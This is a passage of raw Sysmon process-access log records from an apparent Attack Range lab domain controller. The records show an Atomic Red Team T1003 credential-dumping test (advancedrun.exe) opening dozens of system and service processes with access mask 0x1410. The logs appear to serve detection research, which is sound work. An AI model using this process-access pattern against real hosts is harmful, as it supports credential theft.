|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 